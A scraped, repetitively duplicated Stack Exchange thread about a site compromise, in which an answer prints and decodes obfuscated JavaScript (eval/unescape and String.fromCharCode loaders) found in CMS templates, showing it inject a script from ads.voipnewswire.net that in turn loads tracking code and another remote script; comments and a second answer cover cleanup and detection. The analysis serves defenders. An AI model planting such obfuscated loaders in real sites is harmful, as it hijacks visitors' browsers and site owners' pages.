<script type="text/javascript"><![CDATA[eval(unescape("eval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cr%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c/a%29%29%29+%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c+29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28/%5E/%2CString%29%29%7Bwhile%28c--%29r%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%3Bk%3D%5Bfunction%28e%29%7Breturn%20r%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw+%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29if%28k%5Bc%5D%29p%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%276%207%28a%2Cb%29%7Bn%7B4%282.9%29%7B3%20c%3D2.9%28%22o%22%29%3Bc.p%28b%2Cf%2Cf%29%3Ba.q%28c%29%7Dg%7B3%20c%3D2.r%28%29%3Ba.s%28%5C%27t%5C%27+b%2Cc%29%7D%7Du%28e%29%7B%7D%7D6%20h%28a%29%7B4%28a.8%29a%3Da.8%3B4%28a%3D%3D%5C%27%5C%27%29v%3B3%20b%3Da.w%28%5C%27%7C%5C%27%29%5B1%5D%3B3%20c%3B3%20d%3D2.x%28%5C%27y%5C%27%29%3Bz%283%20i%3D0%3Bi%3Cd.5%3Bi++%294%28d%5Bi%5D.A%3D%3D%5C%27B-C-D%5C%27%29c%3Dd%5Bi%5D%3B4%282.j%28%5C%27k%5C%27%29%3D%3DE%7C%7C2.j%28%5C%27k%5C%27%29.l.5%3D%3D0%7C%7Cc.5%3D%3D0%7C%7Cc.l.5%3D%3D0%29%7BF%286%28%29%7Bh%28a%29%7D%2CG%29%7Dg%7Bc.8%3Db%3B7%28c%2C%5C%27m%5C%27%29%3B7%28c%2C%5C%27m%5C%27%29%7D%7D%27%2C43%2C43%2C%27%7C%7Cdocument%7Cvar%7Cif%7Clength%7Cfunction%7CGTranslateFireEvent%7Cvalue%7CcreateEvent%7C%7C%7C%7C%7C%7Ctrue%7Celse%7CdoGTranslate%7C%7CgetElementById%7Cgoogle_translate_element2%7CinnerHTML%7Cchange%7Ctry%7CHTMLEvents%7CinitEvent%7CdispatchEvent%7CcreateEventObject%7CfireEvent%7Con%7Ccatch%7Creturn%7Csplit%7CgetElementsByTagName%7Cselect%7Cfor%7CclassName%7Cgoog%7Cte%7Ccombo%7Cnull%7CsetTimeout%7C500%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29"))/* ]]> */</script>

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));</script>


The last one translates to



var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://ads.voipnewswire.net/ad.js';
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;)
if (alls[i].src.indexOf('voipnewswire') > -1)
nt3 = false;


if (nt3 == true)
document.getElementsByTagName("head")[0].appendChild(elem);



The ad.js is



var _paq = _paq || ;
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
var u="https://voipnewswire.innocraft.cloud/";
_paq.push(['setTrackerUrl', u+'piwik.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'),
s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js';
s.parentNode.insertBefore(g,s);
var cloudscr = document.createElement('script'); cloudscr.type = 'text/javascript'; cloudscr.src = https://glasssunshine.cf/glcf.js; cloudscr.async = true; document.getElementsByTagName("head")[0].appendChild(cloudscr);


Which ultimately leads to ads and tracking javascript, https://voipnewswire.innocraft.cloud/piwik.js



These codes are the problem. You can delete these from the templates of your CMSes.



But I would strongly recommend to just back everything up and start from the clean slate because I suspect that your server/hosting provider is compromised or in control of the attacker.






share|improve this answer






















  • Wow! In what files can I find this code? A whole security team can't figure this out for 24 hours and you find it in 5 minutes? Man, you are brilliant!
    – Bruno Vincent
    Sep 13 at 5:46






  • 19




    @BrunoVincent It will be in the main/base template of the CMS. You really need some re-consideration about that security team.
    – Moonsik Park
    Sep 13 at 5:49







  • 1




    It has a tracking javascript so ad appearance may vary based on their choices. Please select my answer if it helped.
    – Moonsik Park
    Sep 13 at 5:59







  • 3




    @BrunoVincent Virus scanners aren't magic - the code is perfectly valid, not really suspicious, it just does something you don't want it to do. The only real weird thing is that it's obviously trying to go around sanitization (note the multiple encodings trying to do the same thing; this is probably meant to be injected through e.g. your comments section), but there's plenty of legitimate reasons for doing things like that. In the end, the injected code isn't really different from what e.g. Google Ads do.
    – Luaan
    Sep 13 at 8:10






  • 2




    Removing malicious files does very little to fix the problem. Finding and identifying the source of the infection and starting from scratch (aka the duplicate this question is now linked to) is the only answer. Removing these files and then reloading from a clean backup will result in the site being reinfected in 5 minutes if the original source is not understood
    – Conor Mancone
    Sep 13 at 11:28












up vote
18
down vote



accepted







up vote
18
down vote



accepted






I found these javascript on the compromised sites.



<script type="text/javascript" async="" src="https://ads.voipnewswire.net/ad.js"></script>

<script type="text/javascript"><![CDATA[eval(unescape("eval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cr%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c/a%29%29%29+%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c+29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28/%5E/%2CString%29%29%7Bwhile%28c--%29r%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%3Bk%3D%5Bfunction%28e%29%7Breturn%20r%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw+%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29if%28k%5Bc%5D%29p%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%276%207%28a%2Cb%29%7Bn%7B4%282.9%29%7B3%20c%3D2.9%28%22o%22%29%3Bc.p%28b%2Cf%2Cf%29%3Ba.q%28c%29%7Dg%7B3%20c%3D2.r%28%29%3Ba.s%28%5C%27t%5C%27+b%2Cc%29%7D%7Du%28e%29%7B%7D%7D6%20h%28a%29%7B4%28a.8%29a%3Da.8%3B4%28a%3D%3D%5C%27%5C%27%29v%3B3%20b%3Da.w%28%5C%27%7C%5C%27%29%5B1%5D%3B3%20c%3B3%20d%3D2.x%28%5C%27y%5C%27%29%3Bz%283%20i%3D0%3Bi%3Cd.5%3Bi++%294%28d%5Bi%5D.A%3D%3D%5C%27B-C-D%5C%27%29c%3Dd%5Bi%5D%3B4%282.j%28%5C%27k%5C%27%29%3D%3DE%7C%7C2.j%28%5C%27k%5C%27%29.l.5%3D%3D0%7C%7Cc.5%3D%3D0%7C%7Cc.l.5%3D%3D0%29%7BF%286%28%29%7Bh%28a%29%7D%2CG%29%7Dg%7Bc.8%3Db%3B7%28c%2C%5C%27m%5C%27%29%3B7%28c%2C%5C%27m%5C%27%29%7D%7D%27%2C43%2C43%2C%27%7C%7Cdocument%7Cvar%7Cif%7Clength%7Cfunction%7CGTranslateFireEvent%7Cvalue%7CcreateEvent%7C%7C%7C%7C%7C%7Ctrue%7Celse%7CdoGTranslate%7C%7CgetElementById%7Cgoogle_translate_element2%7CinnerHTML%7Cchange%7Ctry%7CHTMLEvents%7CinitEvent%7CdispatchEvent%7CcreateEventObject%7CfireEvent%7Con%7Ccatch%7Creturn%7Csplit%7CgetElementsByTagName%7Cselect%7Cfor%7CclassName%7Cgoog%7Cte%7Ccombo%7Cnull%7CsetTimeout%7C500%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29"))/* ]]> */</script>

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));</script>


The last one translates to



var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://ads.voipnewswire.net/ad.js';
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;)
if (alls[i].src.indexOf('voipnewswire') > -1)
nt3 = false;


if (nt3 == true)
document.getElementsByTagName("head")[0].appendChild(elem);



The ad.js is



var _paq = _paq || ;
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
var u="https://voipnewswire.innocraft.cloud/";
_paq.push(['setTrackerUrl', u+'piwik.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'),
s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js';
s.parentNode.insertBefore(g,s);
var cloudscr = document.createElement('script'); cloudscr.type = 'text/javascript'; cloudscr.src = https://glasssunshine.cf/glcf.js; cloudscr.async = true; document.getElementsByTagName("head")[0].appendChild(cloudscr);


Which ultimately leads to ads and tracking javascript, https://voipnewswire.innocraft.cloud/piwik.js



These codes are the problem. You can delete these from the templates of your CMSes.



But I would strongly recommend to just back everything up and start from the clean slate because I suspect that your server/hosting provider is compromised or in control of the attacker.






share|improve this answer














I found these javascript on the compromised sites.



<script type="text/javascript" async="" src="https://ads.voipnewswire.net/ad.js"></script>

<script type="text/javascript"><![CDATA[eval(unescape("eval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cr%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c/a%29%29%29+%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c+29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28/%5E/%2CString%29%29%7Bwhile%28c--%29r%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%3Bk%3D%5Bfunction%28e%29%7Breturn%20r%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw+%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29if%28k%5Bc%5D%29p%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%276%207%28a%2Cb%29%7Bn%7B4%282.9%29%7B3%20c%3D2.9%28%22o%22%29%3Bc.p%28b%2Cf%2Cf%29%3Ba.q%28c%29%7Dg%7B3%20c%3D2.r%28%29%3Ba.s%28%5C%27t%5C%27+b%2Cc%29%7D%7Du%28e%29%7B%7D%7D6%20h%28a%29%7B4%28a.8%29a%3Da.8%3B4%28a%3D%3D%5C%27%5C%27%29v%3B3%20b%3Da.w%28%5C%27%7C%5C%27%29%5B1%5D%3B3%20c%3B3%20d%3D2.x%28%5C%27y%5C%27%29%3Bz%283%20i%3D0%3Bi%3Cd.5%3Bi++%294%28d%5Bi%5D.A%3D%3D%5C%27B-C-D%5C%27%29c%3Dd%5Bi%5D%3B4%282.j%28%5C%27k%5C%27%29%3D%3DE%7C%7C2.j%28%5C%27k%5C%27%29.l.5%3D%3D0%7C%7Cc.5%3D%3D0%7C%7Cc.l.5%3D%3D0%29%7BF%286%28%29%7Bh%28a%29%7D%2CG%29%7Dg%7Bc.8%3Db%3B7%28c%2C%5C%27m%5C%27%29%3B7%28c%2C%5C%27m%5C%27%29%7D%7D%27%2C43%2C43%2C%27%7C%7Cdocument%7Cvar%7Cif%7Clength%7Cfunction%7CGTranslateFireEvent%7Cvalue%7CcreateEvent%7C%7C%7C%7C%7C%7Ctrue%7Celse%7CdoGTranslate%7C%7CgetElementById%7Cgoogle_translate_element2%7CinnerHTML%7Cchange%7Ctry%7CHTMLEvents%7CinitEvent%7CdispatchEvent%7CcreateEventObject%7CfireEvent%7Con%7Ccatch%7Creturn%7Csplit%7CgetElementsByTagName%7Cselect%7Cfor%7CclassName%7Cgoog%7Cte%7Ccombo%7Cnull%7CsetTimeout%7C500%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29"))/* ]]> */</script>

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));</script>


The last one translates to



var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://ads.voipnewswire.net/ad.js';
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;)
if (alls[i].src.indexOf('voipnewswire') > -1)
nt3 = false;


if (nt3 == true)
document.getElementsByTagName("head")[0].appendChild(elem);



The ad.js is



var _paq = _paq || ;
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
var u="https://voipnewswire.innocraft.cloud/";
_paq.push(['setTrackerUrl', u+'piwik.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'),
s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js';
s.parentNode.insertBefore(g,s);
var cloudscr = document.createElement('script'); cloudscr.type = 'text/javascript'; cloudscr.src = https://glasssunshine.cf/glcf.js; cloudscr.async = true; document.getElementsByTagName("head")[0].appendChild(cloudscr);


Which ultimately leads to ads and tracking javascript, https://voipnewswire.innocraft.cloud/piwik.js



These codes are the problem. You can delete these from the templates of your CMSes.



But I would strongly recommend to just back everything up and start from the clean slate because I suspect that your server/hosting provider is compromised or in control of the attacker.







share|improve this answer














share|improve this answer



share|improve this answer








edited Sep 13 at 15:18

























answered Sep 13 at 3:52









Moonsik Park

36715




36715











  • Wow! In what files can I find this code? A whole security team can't figure this out for 24 hours and you find it in 5 minutes? Man, you are brilliant!
    – Bruno Vincent
    Sep 13 at 5:46






  • 19




    @BrunoVincent It will be in the main/base template of the CMS. You really need some re-consideration about that security team.
    – Moonsik Park
    Sep 13 at 5:49







  • 1




    It has a tracking javascript so ad appearance may vary based on their choices. Please select my answer if it helped.
    – Moonsik Park
    Sep 13 at 5:59







  • 3




    @BrunoVincent Virus scanners aren't magic - the code is perfectly valid, not really suspicious, it just does something you don't want it to do. The only real weird thing is that it's obviously trying to go around sanitization (note the multiple encodings trying to do the same thing; this is probably meant to be injected through e.g. your comments section), but there's plenty of legitimate reasons for doing things like that. In the end, the injected code isn't really different from what e.g. Google Ads do.
    – Luaan
    Sep 13 at 8:10






  • 2




    Removing malicious files does very little to fix the problem. Finding and identifying the source of the infection and starting from scratch (aka the duplicate this question is now linked to) is the only answer. Removing these files and then reloading from a clean backup will result in the site being reinfected in 5 minutes if the original source is not understood
    – Conor Mancone
    Sep 13 at 11:28
















  • Wow! In what files can I find this code? A whole security team can't figure this out for 24 hours and you find it in 5 minutes? Man, you are brilliant!
    – Bruno Vincent
    Sep 13 at 5:46






  • 19




    @BrunoVincent It will be in the main/base template of the CMS. You really need some re-consideration about that security team.
    – Moonsik Park
    Sep 13 at 5:49







  • 1




    It has a tracking javascript so ad appearance may vary based on their choices. Please select my answer if it helped.
    – Moonsik Park
    Sep 13 at 5:59







  • 3




    @BrunoVincent Virus scanners aren't magic - the code is perfectly valid, not really suspicious, it just does something you don't want it to do. The only real weird thing is that it's obviously trying to go around sanitization (note the multiple encodings trying to do the same thing; this is probably meant to be injected through e.g. your comments section), but there's plenty of legitimate reasons for doing things like that. In the end, the injected code isn't really different from what e.g. Google Ads do.
    – Luaan
    Sep 13 at 8:10






  • 2




    Removing malicious files does very little to fix the problem. Finding and identifying the source of the infection and starting from scratch (aka the duplicate this question is now linked to) is the only answer. Removing these files and then reloading from a clean backup will result in the site being reinfected in 5 minutes if the original source is not understood
    – Conor Mancone
    Sep 13 at 11:28















Wow! In what files can I find this code? A whole security team can't figure this out for 24 hours and you find it in 5 minutes? Man, you are brilliant!
– Bruno Vincent
Sep 13 at 5:46




Wow! In what files can I find this code? A whole security team can't figure this out for 24 hours and you find it in 5 minutes? Man, you are brilliant!
– Bruno Vincent
Sep 13 at 5:46




19




19




@BrunoVincent It will be in the main/base template of the CMS. You really need some re-consideration about that security team.
– Moonsik Park
Sep 13 at 5:49





@BrunoVincent It will be in the main/base template of the CMS. You really need some re-consideration about that security team.
– Moonsik Park
Sep 13 at 5:49





1




1




It has a tracking javascript so ad appearance may vary based on their choices. Please select my answer if it helped.
– Moonsik Park
Sep 13 at 5:59





It has a tracking javascript so ad appearance may vary based on their choices. Please select my answer if it helped.
– Moonsik Park
Sep 13 at 5:59





3




3




@BrunoVincent Virus scanners aren't magic - the code is perfectly valid, not really suspicious, it just does something you don't want it to do. The only real weird thing is that it's obviously trying to go around sanitization (note the multiple encodings trying to do the same thing; this is probably meant to be injected through e.g. your comments section), but there's plenty of legitimate reasons for doing things like that. In the end, the injected code isn't really different from what e.g. Google Ads do.
– Luaan
Sep 13 at 8:10




@BrunoVincent Virus scanners aren't magic - the code is perfectly valid, not really suspicious, it just does something you don't want it to do. The only real weird thing is that it's obviously trying to go around sanitization (note the multiple encodings trying to do the same thing; this is probably meant to be injected through e.g. your comments section), but there's plenty of legitimate reasons for doing things like that. In the end, the injected code isn't really different from what e.g. Google Ads do.
– Luaan
Sep 13 at 8:10




2




2




Removing malicious files does very little to fix the problem. Finding and identifying the source of the infection and starting from scratch (aka the duplicate this question is now linked to) is the only answer. Removing these files and then reloading from a clean backup will result in the site being reinfected in 5 minutes if the original source is not understood
– Conor Mancone
Sep 13 at 11:28




Removing malicious files does very little to fix the problem. Finding and identifying the source of the infection and starting from scratch (aka the duplicate this question is now linked to) is the only answer. Removing these files and then reloading from a clean backup will result in the site being reinfected in 5 minutes if the original source is not understood
– Conor Mancone
Sep 13 at 11:28












up vote
0
down vote













Just to @Moonsik Park answer : You can use Browser developer mode redirect log preservation features to locate which script do the redirect.



  • In Google developer mode, it is a "Preserve log" checkbox under network

  • In firefox developer mode, it is a "Persist Logs"checkbox under network

Take the compromised xuzo.com as example, open the website in browser developer mode and the log presrevation enabled, you can see something like following before it jump to another website



https://ads.voipnewswire.net/ad.js initiator is 
http://xuzo.com/sites/default/files/js/js_5yveJEfYnvdHe_DxshzrVq3ttzeNp-8Ai8MVx1bt2eo.js


Open the file, you will see something like this in the header



eval(String.fromCharCode(118, 97, 114, 32, 10....


Unfortunately, String.fromCharCode is legitimate Javascript code and frequently used by many website to hide info such as email address from spammer. I doubt security software can use String.fromCharCode as a reason to locate the bad code without generate a lot of false alarm.



However, if you never use such code, a simple fgrep will help you locate the files, e.g.



frep -lR 'fromCharCode' '/path/to/cms/'





share|improve this answer




















  • Thats sounds good, I think I never use such code, these are just Drupal and Worpress sites, how do I run the fgrep, I use Cpanel, is it a simple find and replace?
    – Bruno Vincent
    Sep 13 at 9:30










  • Additionally, it seems the scripts load randomly, only on first page load, second time around the script doesn;t always run, so seems it's made to load randomly or for first time load? So the hosting company thinks it's fixed, but it's not...;(
    – Bruno Vincent
    Sep 13 at 9:31










  • @BrunoVincent I think you should focus on stuff that store inside /sites/default/files/js/. If you cannot find anything there, then you need to check drupal code or web server and see alias path mapping to that path.
    – mootmoot
    Sep 13 at 9:41














up vote
0
down vote













Just to @Moonsik Park answer : You can use Browser developer mode redirect log preservation features to locate which script do the redirect.



  • In Google developer mode, it is a "Preserve log" checkbox under network

